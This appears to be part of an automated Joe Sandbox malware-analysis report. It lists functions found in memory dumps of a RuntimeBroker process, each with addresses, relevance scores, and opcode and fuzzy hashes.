_, xrefs: 00007FFD9B8B0839

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 7fe3b00f9e5de8139e229a8a085468d965edfd3d7ec4b231a0627f455e1098dd
Instruction ID: a71a22df50a6aa80a960eef7dc289ac4e7e8fabb9cc6e041cb2c8dbf2f35dbed
Opcode Fuzzy Hash: 7fe3b00f9e5de8139e229a8a085468d965edfd3d7ec4b231a0627f455e1098dd
Instruction Fuzzy Hash: D8817C43B1F6D54EE36563BD6C290F97FA0EF46264B0902FBE0988A0F7EC15950687C6

Function 00007FFD9B8B0640 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD9B8B0839

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 8754d33cb972abeee75737d562a28d27db7e6c04d84a31e006ebeb5e09bcfe83
Instruction ID: 95c18053beb3ecf561f38925721c8bd57a59d7fa9a3dea378abb0dffabe4d7e0
Opcode Fuzzy Hash: 8754d33cb972abeee75737d562a28d27db7e6c04d84a31e006ebeb5e09bcfe83
Instruction Fuzzy Hash: 25716943B1F6E60AE36523BD6C391F97F60EF42664B0902FBE0A84A0F7EC15550687C6

Function 00007FFD9B8C18AD Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

n\, xrefs: 00007FFD9B8C1B60

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: n\
API String ID: 0-3537540548
Opcode ID: cab66a373c54d0d9c70940a80f2ccd153b0d8928f4bef563c7595437b7de5711
Instruction ID: 88a07aa681bd2b69e5a454ccbf239ac933bbb558db75fda5d9953a9c79a23690
Opcode Fuzzy Hash: cab66a373c54d0d9c70940a80f2ccd153b0d8928f4bef563c7595437b7de5711
Instruction Fuzzy Hash: 72416D70E0A54E8FDB68FBA4C4A56FD77A1EF59300F11057ED00AD72E5DE38AA458B40

Function 00007FFD9B8B0805 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD9B8B0839

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: a548cfadb902d492db0645f8fa41e032a3a66a010107fa8a6603068b9e129e38
Instruction ID: 42c135f60b2f2d9b34e4b6f9808d9b70d819bed592040d9331dc5c6bbd21258e
Opcode Fuzzy Hash: a548cfadb902d492db0645f8fa41e032a3a66a010107fa8a6603068b9e129e38
Instruction Fuzzy Hash: 1921AA62B0E29B5BD71677BC9C392E93B90FF01318F0901B7C099C90D3ED18915AC2C2

Function 00007FFD9B8C37CD Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

Zr, xrefs: 00007FFD9B8C37D9

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: Zr
API String ID: 0-4206875044
Opcode ID: 00344f6f4fe43f4d075d9bf97436f8950350392aa9465003b1130c54700f08ec
Instruction ID: b9e53718cc9fed2bce094e035420d6d4423f9c2da2bc06fb36844e2b40013e83
Opcode Fuzzy Hash: 00344f6f4fe43f4d075d9bf97436f8950350392aa9465003b1130c54700f08ec
Instruction Fuzzy Hash: E51118B1E0511E9EDB60EFA9C4566FCB6F0EB18301F518177E019E2291DB3857859F10

Function 00007FFD9B8C13F3 Relevance: 1.3, Strings: 1, Instructions: 10COMMON

Download Yara Rule

Strings

(, xrefs: 00007FFD9B8C140A

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 2e9231d48b6a8c127f66c9e19cc9145685575e5c30ce6e0dfb54771cdfe339c6
Instruction ID: ed5fcd0855b479bed42b3f245c3f76c36738231a0aa588680d1081c19c6b25a8
Opcode Fuzzy Hash: 2e9231d48b6a8c127f66c9e19cc9145685575e5c30ce6e0dfb54771cdfe339c6
Instruction Fuzzy Hash: 2ED01274D0821D8BDB14FF90C8E05FD77F1BF14300F00116A901A5B2C5CB782644CB40

Function 00007FFD9B8C2C35 Relevance: .5, Instructions: 537COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6673943724537b613aa5ac8129c2963f240c5ac18d0a525a74ffde4b8dc8ca5f
Instruction ID: 13b095ab1642c6ecb582168f168c4c08693ddfd6f38662ed33d1c17d725ed533
Opcode Fuzzy Hash: 6673943724537b613aa5ac8129c2963f240c5ac18d0a525a74ffde4b8dc8ca5f
Instruction Fuzzy Hash: 5351B762A0F7D94FE753ABB848795A97FB0EF16214B0901FBC498CB0E7D9285509C352

Function 00007FFD9B8BD2F5 Relevance: .4, Instructions: 393COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1f616913b76650183c5750851a859c6ab8e8699f5edbfc4075d176267cb949c
Instruction ID: 314d9b40d7f8a2f7b690213dd4453fa32e1858195e6b67960e8083d4fceaf682
Opcode Fuzzy Hash: f1f616913b76650183c5750851a859c6ab8e8699f5edbfc4075d176267cb949c
Instruction Fuzzy Hash: 7EE15B71E1965D8FEBACDBA8C8A4BB8B7A1FF18304F0401B9D01DD72A6DA346941CF41

Function 00007FFD9B8B1648 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79ec664a8426283977889ee8ea22f72e33564a24751357480a0a433efe7b2b26
Instruction ID: f4b4aee2b30e8457bb257ee62ec91a7292223acb5420f95013f925720e8ef30a
Opcode Fuzzy Hash: 79ec664a8426283977889ee8ea22f72e33564a24751357480a0a433efe7b2b26
Instruction Fuzzy Hash: F681D131B1DA5D4FDB68EF6C88615A977E2FF98300B15017AE45DC72A6DE30AD028B81

Function 00007FFD9B8B0FB0 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a738ca26840329be66ae773b35fb7dbb114a052d85c65c4ac0432538109aab7
Instruction ID: dbe6b48460b78bef379ea3e68b949fb626ca6c8743dc934e882b5c88c03dd100
Opcode Fuzzy Hash: 9a738ca26840329be66ae773b35fb7dbb114a052d85c65c4ac0432538109aab7
Instruction Fuzzy Hash: 0F819471E19A1D4BDB68EB688865BACB3A1FF54310F0042B9D01DD71E6DE346A458B80

Function 00007FFD9B8B1CAD Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8be2e0111b0aa326b98f2519f5107293e774d0500d3ef88f1d5ac7b656424313
Instruction ID: 69290317f6b4f4dd6e78930009e03496d572b20b9b38cd52e9d473e9213687cc
Opcode Fuzzy Hash: 8be2e0111b0aa326b98f2519f5107293e774d0500d3ef88f1d5ac7b656424313
Instruction Fuzzy Hash: 9A51F331B19B9D4FDB58DF5888615BA77E2FF98300B15417ED45ACB291DE34E8028BC1

Function 00007FFD9B8C33FB Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f47d57791025a18bee775c418770dc5cf51b7d29ab6476a990650cc9493c1f9e
Instruction ID: 375be69b3336762c40eb23b3e9438f74b29239bf5df1c044b081c9ebe5ecba66
Opcode Fuzzy Hash: f47d57791025a18bee775c418770dc5cf51b7d29ab6476a990650cc9493c1f9e
Instruction Fuzzy Hash: 9C417C7770E6A95EE712FBACBC954E97FA0EF41375B0802B7C948CB057E934944A8390

Function 00007FFD9B8B3145 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bd9912b779d22861432c561b800c3f7803a11083c77466e94a5628753af77f3
Instruction ID: 40e8ea345da628f150fcb5c9b59dcb1a62767f130f05830f0899cb26c9695d5c
Opcode Fuzzy Hash: 7bd9912b779d22861432c561b800c3f7803a11083c77466e94a5628753af77f3
Instruction Fuzzy Hash: 00513C70E0A52E8FEB64EBE4D4646ED77F1FF58301F41017AD009E72A6DA386A458B81

Function 00007FFD9B8C25EE Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675d667ed3ce3695df410efac38a7ac44da23f311bc2ce5bb4a800f79ced7777
Instruction ID: a7af084fc3483d39dd6cc5560fedc43fe674e58e8c0c3c8df3469ce9b21c3835
Opcode Fuzzy Hash: 675d667ed3ce3695df410efac38a7ac44da23f311bc2ce5bb4a800f79ced7777
Instruction Fuzzy Hash: 9851E670E1462D8EDB64EFA8C865BEDB7B1FF58300F0081B6D01DA3296DB346A858F50

Function 00007FFD9B8BA838 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 325072a4ca08dc8c5b46a66e715892f6eead706d7eb6c8c72bed719e9a1d77f8
Instruction ID: aff6e1121c9c3ae6e6c574e7e1bc95931e34ed5072a34d2dc535f20a2ae1b10d
Opcode Fuzzy Hash: 325072a4ca08dc8c5b46a66e715892f6eead706d7eb6c8c72bed719e9a1d77f8
Instruction Fuzzy Hash: BE411771E0E51F6EE751ABB888695F97BE0FF19310F024576D02CC30E6EE34A6418B80

Function 00007FFD9B8C2438 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f2ef31ce66a66bdb5858b6c36e7a293a97148781efd566f3d47f7c64ca0483e
Instruction ID: 9269e9ac2fe51bb21f4354c08a7c986f9240f45306c79daaf56414a7ba96b8cb
Opcode Fuzzy Hash: 0f2ef31ce66a66bdb5858b6c36e7a293a97148781efd566f3d47f7c64ca0483e
Instruction Fuzzy Hash: 8241C770E1462D8FDB64EFA4C865BEDB7B1FF58300F1085A6D01DA3296DB746A858F80

Function 00007FFD9B8BBA62 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 806733059b55a85a99023f6186b016307548713c28c65ff220367ff6cd386564
Instruction ID: ce2bcc6c412243e9a7babaefd542b27b724c74e8566500faae9db21d45d5dfdf
Opcode Fuzzy Hash: 806733059b55a85a99023f6186b016307548713c28c65ff220367ff6cd386564
Instruction Fuzzy Hash: 0A31FE74E1992D9EDBA4EBA89861AFCB7B5FF5C300F911079D04DE32A6CE2469418B40

Function 00007FFD9B8C6E11 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d995552eec54888947ecb77e812e8e20fe25da3c9425bfc0618910e66667549
Instruction ID: 31b44ead0ad6fe3119148d42f97c5de5ce111e41b45f9079bac5a79d116bb4b5
Opcode Fuzzy Hash: 7d995552eec54888947ecb77e812e8e20fe25da3c9425bfc0618910e66667549
Instruction Fuzzy Hash: 28314CB0A0A51E9FEB51FBA8C8586BA7BF0FF29301F0105B7D419D7065DB34A6448750

Function 00007FFD9B8BBAD0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1564cbf58443fd5bbc68cef5f924c1d950bed4f20b7e6cae1a478cbf3f06e64
Instruction ID: 2587ab76779a986bdb3ab4de0dbc5c5e4c940c110e8238dccb879b91c7cacac7
Opcode Fuzzy Hash: e1564cbf58443fd5bbc68cef5f924c1d950bed4f20b7e6cae1a478cbf3f06e64
Instruction Fuzzy Hash: 0C213174E1D92D8FDBA4EBA888616FCB7B5FF5D300F911139D04DE32A6CE2469418B80

Function 00007FFD9B8C1C10 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc3645cf6ef700f24d96fc03731b01720d85448d55c856d7fc173c89d9b31e5b
Instruction ID: 2e8838fd9bed9d39093f4d32aa4a3181e1b4e1708a5fe7496398db3e1ea0bbb3
Opcode Fuzzy Hash: fc3645cf6ef700f24d96fc03731b01720d85448d55c856d7fc173c89d9b31e5b
Instruction Fuzzy Hash: 5821D07094E2CA4FD717AB7088B55F57FB0EF0B214B0A00EBE099CB0A3DA2D6556C312

Function 00007FFD9B8B33D1 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dbf810eb15f374ae4901267e949be0288d79fde8882074215cf8a03d5baf1c3
Instruction ID: 64d61f8c704d59578d5f32f236ab42ea17ab64e2640780a1ab470e801c63c915
Opcode Fuzzy Hash: 9dbf810eb15f374ae4901267e949be0288d79fde8882074215cf8a03d5baf1c3
Instruction Fuzzy Hash: AA213D31A0A95E8FEB69EBB488686BE77A0FF18304F01057AD41DC71A1DF35A640DB80

Function 00007FFD9B8B3330 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c4db1e6fa7cd02756e4c24852dd4d49d1e2e859640de238d1335760e9b53554
Instruction ID: da03c230497cdb141679702ce8ad4f9383c175eec21497e697ad10f04b847ab9
Opcode Fuzzy Hash: 0c4db1e6fa7cd02756e4c24852dd4d49d1e2e859640de238d1335760e9b53554
Instruction Fuzzy Hash: DA21803054E79A8FD7539BB488685A97FF0FF4B310B0605E7D045CB0B2DA289546CB51

Function 00007FFD9B8B3213 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ce5b3a6cadfa9cd927897df41a1654a3af7b30fe7cd5f7d45271689bbcd64c1
Instruction ID: a3985c2304969bc2d42b6d1bf82471a1799664a730e5d6848376ad07614f2cbf
Opcode Fuzzy Hash: 0ce5b3a6cadfa9cd927897df41a1654a3af7b30fe7cd5f7d45271689bbcd64c1
Instruction Fuzzy Hash: 1B21C670E0952E8FEB64EBA8C464AEC7BB1FF58301F11417AD009E72A5DA386945CF50

Function 00007FFD9B8C75B9 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68ecb8e516fd425bd3c33d9abedc1d9952a24fa795aad10201989a532d0e04a1
Instruction ID: b097f7eca246c64eaf8a2ded151e265ccfde8eb6c39f2bdf736950df0f5e8b76
Opcode Fuzzy Hash: 68ecb8e516fd425bd3c33d9abedc1d9952a24fa795aad10201989a532d0e04a1
Instruction Fuzzy Hash: F6218E74A4A64E8FDB69AF64C8656FD3BA0FF19304F0104BBD42DC21E6DE39AA50C701

Function 00007FFD9B8B0A01 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be55974d4f69934a829213b037a7d8d811768326f6d5d57229d7cef302dfb1b1
Instruction ID: 79c6203e488830523f0d4e84939472adf6e679fcc40a8600fc6da3df5ab09760
Opcode Fuzzy Hash: be55974d4f69934a829213b037a7d8d811768326f6d5d57229d7cef302dfb1b1
Instruction Fuzzy Hash: 9411B230E2A51E4FE790EBB888695BD77E0FF58740F4159B6D418C70A6EE34A6408B80

Function 00007FFD9B8C6795 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e3642ed69ce60ba6c55dffb6e59e1983dffb167fbf0bdf4849f3ad6df35d022
Instruction ID: d98fdd29d223221276b1d6775015b84cbe1e9a65a789dfe31109b3baa8d2291d
Opcode Fuzzy Hash: 4e3642ed69ce60ba6c55dffb6e59e1983dffb167fbf0bdf4849f3ad6df35d022
Instruction Fuzzy Hash: 8411B4B0A0964E8FEB98EF6884656BD7BA1FF68300F110A7FD41DC31A6DE34A541C741

Function 00007FFD9B8C7005 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7be0d6592f451f24483b4783ba652fa20f1641aac7b0ce297dd345f5efd52b6e
Instruction ID: 915556f0613a56c013d307ac9dd75a6976fc9baa40bd4d00c20c4577e360d6b4
Opcode Fuzzy Hash: 7be0d6592f451f24483b4783ba652fa20f1641aac7b0ce297dd345f5efd52b6e
Instruction Fuzzy Hash: 261193B4A1A64E8BE7A1BB7484696F977E0FF1C304F0145B3D41CC70A6EE28A6548701

Function 00007FFD9B8C2B99 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3300fe6a9c311a4d3c5c1932e7bda3f4d2376634dc4359f5df61486be0783bfc
Instruction ID: e8d423d59c05d8407930698189e75e0a11a445bf4c699928ccbca67b44707afb
Opcode Fuzzy Hash: 3300fe6a9c311a4d3c5c1932e7bda3f4d2376634dc4359f5df61486be0783bfc
Instruction Fuzzy Hash: 3321963090E68A4FE752EBB488696F57FF0EF1A310B0505F7D458C70A2DA285554C751

Function 00007FFD9B8C66F1 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 128955c44c708620b82565de286bb70e20efd3aeb883492d41dc4f24af462b76
Instruction ID: d295293d4dab7ca87d7d95754bd9a701bee2f89eafa8f3885a619f8156a4d15d
Opcode Fuzzy Hash: 128955c44c708620b82565de286bb70e20efd3aeb883492d41dc4f24af462b76
Instruction Fuzzy Hash: 2F11A5B0A0964E8FDB59EF6484691B97BF0FF68301F1105BFD41DC71A5DA35A540C741

Function 00007FFD9B8C4105 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad5de1bc448a293f74fc3410801a00b672032328062da18c95991b487dca00d4
Instruction ID: de4d257d34afab01d74a9bf2a353e95f95c356fe53d5c01de0943f657f98715f
Opcode Fuzzy Hash: ad5de1bc448a293f74fc3410801a00b672032328062da18c95991b487dca00d4
Instruction Fuzzy Hash: D211D670A0964E9FDB99EF68C4662B97BE0FF68301F1605BFD41DC71A1DA34A680C741

Function 00007FFD9B8C203C Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cfaa21eb63d0a97ca5168d3ed4c937ec8fbef43e41b8ab614836f54b0ca5400
Instruction ID: ecec13ea8941845ad686e14802ce088fbda9844f26558918c2800af1842608ad
Opcode Fuzzy Hash: 6cfaa21eb63d0a97ca5168d3ed4c937ec8fbef43e41b8ab614836f54b0ca5400
Instruction Fuzzy Hash: 3521933050E38A8FD756AF7088654B87FB0FF0B304B1645EFD449C70E2DA696655C712

Function 00007FFD9B8C4625 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7506379806ae9c63baff1d3c817cd337e76d6d9c6549b17510f6fad12e0ae005
Instruction ID: 64239d4ad00e2c577c7972225b11693086127b23d33d8588e450726f5a7d126f
Opcode Fuzzy Hash: 7506379806ae9c63baff1d3c817cd337e76d6d9c6549b17510f6fad12e0ae005
Instruction Fuzzy Hash: 421126B0A0EA8D4BFB69EBA4C8756B83BA0FF19300F0901BFD01DC61E6DA656580C601

Function 00007FFD9B8C1E21 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42d34ca9a7f9c109029a3173234866564a8d6483b74bca720f5551c68188e7eb
Instruction ID: f37fd7ff9c5f8403205c07abf6972ea74697038c658682808836ffa29b908a5d
Opcode Fuzzy Hash: 42d34ca9a7f9c109029a3173234866564a8d6483b74bca720f5551c68188e7eb
Instruction Fuzzy Hash: 04117970A1A64D8FDB58EF68C4A55F93BE1FF5D304F4201AEE84AC32A1CB34A550CB81

Function 00007FFD9B8C6835 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 529e8fb9daec5f380b5ea8d952b23164a34ee3f690a20d1cabd5e72c8b5f150a
Instruction ID: 68eacb2dfe21cb7ac93f189b76ebcbdc9e93aaea1b30bf2a93208b36f5e3913f
Opcode Fuzzy Hash: 529e8fb9daec5f380b5ea8d952b23164a34ee3f690a20d1cabd5e72c8b5f150a
Instruction Fuzzy Hash: FB11E2B1A0EA8D4FEB69EF6488B51B83BA0FF68300F0601BFD45DC75A2DE256544C701

Function 00007FFD9B8C4999 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
